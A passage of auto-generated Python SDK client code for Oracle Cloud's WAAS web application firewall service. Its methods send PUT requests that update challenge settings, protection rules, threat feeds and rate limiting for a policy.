Updates the Human Interaction Challenge (HIC) settings in the Web Application Firewall configuration for a WAAS policy. HIC is a countermeasure that allows the proxy to check the user's browser for various behaviors that distinguish a human presence from a bot.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.waas.models.HumanInteractionChallenge update_human_interaction_challenge_details: (required)
The human interaction challenge settings.
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/update_human_interaction_challenge.py.html>`__ to see an example of how to use update_human_interaction_challenge API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/humanInteractionChallenge"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"opc_retry_token",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_human_interaction_challenge got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_human_interaction_challenge_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_human_interaction_challenge_details)
def update_js_challenge(self, waas_policy_id, update_js_challenge_details, **kwargs):
"""
Updates the JavaScript challenge settings in the Web Application Firewall configuration for a WAAS policy. JavaScript Challenge validates that the client can accept JavaScript with a binary decision. For more information, see `Bot Management`__.
__ https://docs.cloud.oracle.com/iaas/Content/WAF/Tasks/botmanagement.htm
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.waas.models.JsChallenge update_js_challenge_details: (required)
The JavaScript challenge settings to be updated.
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/update_js_challenge.py.html>`__ to see an example of how to use update_js_challenge API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/jsChallenge"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"opc_retry_token",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_js_challenge got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_js_challenge_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_js_challenge_details)
def update_policy_config(self, waas_policy_id, update_policy_config_details, **kwargs):
"""
Updates the configuration for a WAAS policy. Only the fields specified in the request body will be updated; all other properties will remain unchanged.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.waas.models.PolicyConfig update_policy_config_details: (required)
The new configuration to apply to a WAAS policy.
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/update_policy_config.py.html>`__ to see an example of how to use update_policy_config API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/policyConfig"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"opc_retry_token",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_policy_config got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_policy_config_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_policy_config_details)
def update_protection_rules(self, waas_policy_id, protection_rules, **kwargs):
"""
Updates the action for each specified protection rule. Requests can either be allowed, blocked, or trigger an alert if they meet the parameters of an applied rule. For more information on protection rules, see `WAF Protection Rules`__.
This operation can update or disable protection rules depending on the structure of the request body.
Protection rules can be updated by changing the properties of the protection rule object with the rule's key specified in the key field.
__ https://docs.cloud.oracle.com/iaas/Content/WAF/Tasks/wafprotectionrules.htm
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.waas.models.list[ProtectionRuleAction] protection_rules: (required)
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/update_protection_rules.py.html>`__ to see an example of how to use update_protection_rules API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/protectionRules"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_protection_rules got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=protection_rules)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=protection_rules)
def update_protection_settings(self, waas_policy_id, update_protection_settings_details, **kwargs):
"""
Updates the protection settings in the Web Application Firewall configuration for a WAAS policy. Protection settings allow you define what action is taken when a request is blocked by the Web Application Firewall, such as returning a response code or block page. Only the fields specified in the request body will be updated; all other fields will remain unchanged.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.waas.models.ProtectionSettings update_protection_settings_details: (required)
The details of the protection settings to be updated.
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/update_protection_settings.py.html>`__ to see an example of how to use update_protection_settings API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/protectionSettings"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"opc_retry_token",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_protection_settings got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_protection_settings_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_protection_settings_details)
def update_threat_feeds(self, waas_policy_id, threat_feeds, **kwargs):
"""
Updates the action to take when a request's IP address matches an address in the specified threat intelligence feed. Threat intelligence feeds are compiled lists of IP addresses with malicious reputations based on internet intelligence. Only the threat feeds specified in the request body will be updated; all other threat feeds will remain unchanged.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.waas.models.list[ThreatFeedAction] threat_feeds: (required)
A list of threat feeds for which to update the actions.
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/update_threat_feeds.py.html>`__ to see an example of how to use update_threat_feeds API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/threatFeeds"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_threat_feeds got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=threat_feeds)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=threat_feeds)
def update_waas_policy(self, waas_policy_id, update_waas_policy_details, **kwargs):
"""
Updates the details of a WAAS policy, including origins and tags. Only the fields specified in the request body will be updated; all other properties will remain unchanged.
To update platform provided resources such as `GoodBots`, `ProtectionRules`, and `ThreatFeeds`, first retrieve the list of available resources with the related list operation such as `GetThreatFeeds` or `GetProtectionRules`.
The returned list will contain objects with `key` properties that can be used to update the resource during the `UpdateWaasPolicy` request.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.waas.models.UpdateWaasPolicyDetails update_waas_policy_details: (required)
The details of the WAAS policy to update.
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/update_waas_policy.py.html>`__ to see an example of how to use update_waas_policy API.
"""
resource_path = "/waasPolicies/{waasPolicyId}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"opc_retry_token",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_waas_policy got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_waas_policy_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_waas_policy_details)
def update_waas_policy_custom_protection_rules(self, waas_policy_id, update_custom_protection_rules_details, **kwargs):
"""
Updates the action for each specified custom protection rule. Only the `DETECT` and `BLOCK` actions can be set. Disabled rules should not be included in the list. For more information on protection rules, see `WAF Protection Rules`__.
__ https://docs.cloud.oracle.com/iaas/Content/WAF/Tasks/wafprotectionrules.htm
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.waas.models.list[CustomProtectionRuleSetting] update_custom_protection_rules_details: (required)
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/update_waas_policy_custom_protection_rules.py.html>`__ to see an example of how to use update_waas_policy_custom_protection_rules API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/customProtectionRules"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"opc_retry_token",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_waas_policy_custom_protection_rules got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_custom_protection_rules_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_custom_protection_rules_details)
def update_waf_address_rate_limiting(self, waas_policy_id, update_waf_address_rate_limiting_details, **kwargs):
"""
Updates the address rate limiting settings in the Web Application Firewall configuration for a policy. Rate limiting allows you to configure a threshold for the number of requests from a unique IP address for the given period. You can also define the response code for the requests from the same address that exceed the threshold.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.waas.models.AddressRateLimiting update_waf_address_rate_limiting_details: (required)
The address rate limiting settings.
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
